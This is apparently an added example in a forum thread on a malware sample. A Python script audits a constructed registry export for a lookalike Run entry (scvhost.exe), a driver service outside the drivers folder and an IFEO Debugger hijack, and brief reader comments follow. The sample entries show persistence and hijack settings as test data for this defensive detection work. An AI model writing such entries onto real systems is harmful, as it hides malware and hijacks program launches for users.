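The three persistence and hijack points this sample touches, the PCIDump driver service (step 5 of the main program), the RsTray Run value that launches scvhost.exe (step 2 of 28720812_xeex.exe), and the Image File Execution Options changes made by killdll.dll, can all be audited from a registry export. As an added example that is not part of the original post, the Python below parses a constructed .reg-style export covering those three keys and flags a Run entry whose image name mimics a Windows system binary, a kernel-driver service whose ImagePath lies outside system32\drivers, and any IFEO subkey carrying a Debugger value. The ImagePath for PCIDump, the subkey name examplescanner.exe, the ExampleGood service and the list of mimicked system binaries are all assumptions of mine; the page does not give them.

```python
import difflib
import re

# Constructed .reg-style export (my own, not captured from the sample) covering the
# three locations the analysis names. The PCIDump ImagePath, the ExampleGood service
# and the IFEO subkey examplescanner.exe are placeholders; the page does not give them.
SAMPLE_REG_EXPORT = r'''
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RsTray"="C:\\WINDOWS\\system32\\scvhost.exe"
"ExampleUpdater"="C:\\Program Files\\Example\\updater.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PCIDump]
"Type"=dword:00000001
"Start"=dword:00000003
"ImagePath"="C:\\WINDOWS\\pcidump.sys"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ExampleGood]
"Type"=dword:00000001
"Start"=dword:00000003
"ImagePath"="system32\\DRIVERS\\examplegood.sys"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\examplescanner.exe]
"Debugger"="C:\\WINDOWS\\system32\\scvhost.exe"
'''

RUN_KEY = r'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
SERVICES_KEY = r'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services'
IFEO_KEY = (r'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
            r'\Image File Execution Options')
SERVICE_KERNEL_DRIVER = 1  # Services\<name>\Type value for a kernel driver
# Names worth protecting against lookalikes (assumed list; scvhost.exe mimics svchost.exe)
SYSTEM_BINARIES = ('svchost.exe', 'csrss.exe', 'lsass.exe', 'explorer.exe')


def parse_reg_export(text):
    """Minimal .reg parser: {key_path: {value_name: str | int}} for REG_SZ and REG_DWORD."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('Windows Registry Editor'):
            continue
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        if current is None or '=' not in line:
            continue
        name, _, value = line.partition('=')
        if value.startswith('"') and value.endswith('"'):
            value = value[1:-1].replace('\\\\', '\\')   # .reg doubles backslashes
        elif value.lower().startswith('dword:'):
            value = int(value[6:], 16)
        keys[current][name.strip('"')] = value
    return keys


def looks_like_system_binary(basename):
    """Return the system binary a name mimics (scvhost.exe -> svchost.exe), else None."""
    b = basename.lower()
    for legit in SYSTEM_BINARIES:
        if b != legit and difflib.SequenceMatcher(None, b, legit).ratio() >= 0.85:
            return legit
    return None


def audit_registry(text):
    """Return (category, subject, detail) tuples for the three hijack points."""
    findings = []
    for key, values in parse_reg_export(text).items():
        if key == RUN_KEY:
            for name, cmd in values.items():
                m = re.search(r'([^\\"]+\.exe)\b', str(cmd), re.I)  # image basename
                legit = looks_like_system_binary(m.group(1)) if m else None
                if legit:
                    findings.append(('run_key_lookalike', name, f'{m.group(1)} mimics {legit}'))
        elif key.startswith(SERVICES_KEY + '\\'):
            if values.get('Type') == SERVICE_KERNEL_DRIVER:
                image = str(values.get('ImagePath', '')).lower()
                if 'system32\\drivers\\' not in image:
                    findings.append(('driver_outside_drivers_dir', key.rsplit('\\', 1)[1], image))
        elif key.startswith(IFEO_KEY + '\\') and 'Debugger' in values:
            # A Debugger value makes Windows launch that path instead of the named program
            findings.append(('ifeo_debugger_hijack', key.rsplit('\\', 1)[1], values['Debugger']))
    return findings


if __name__ == '__main__':
    for category, subject, detail in audit_registry(SAMPLE_REG_EXPORT):
        print(f'{category:<28} {subject:<20} {detail}')
```

On a live machine the same checks can be fed the output of `reg export` for each of the three keys; the IFEO rule deliberately reports every Debugger value, since a legitimate one is rare enough that each deserves a look.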
This is great, haha.
Came to take a look and learn!
Sincere thanks~~~~
My head is spinning after reading this. Is it like this for every newbie?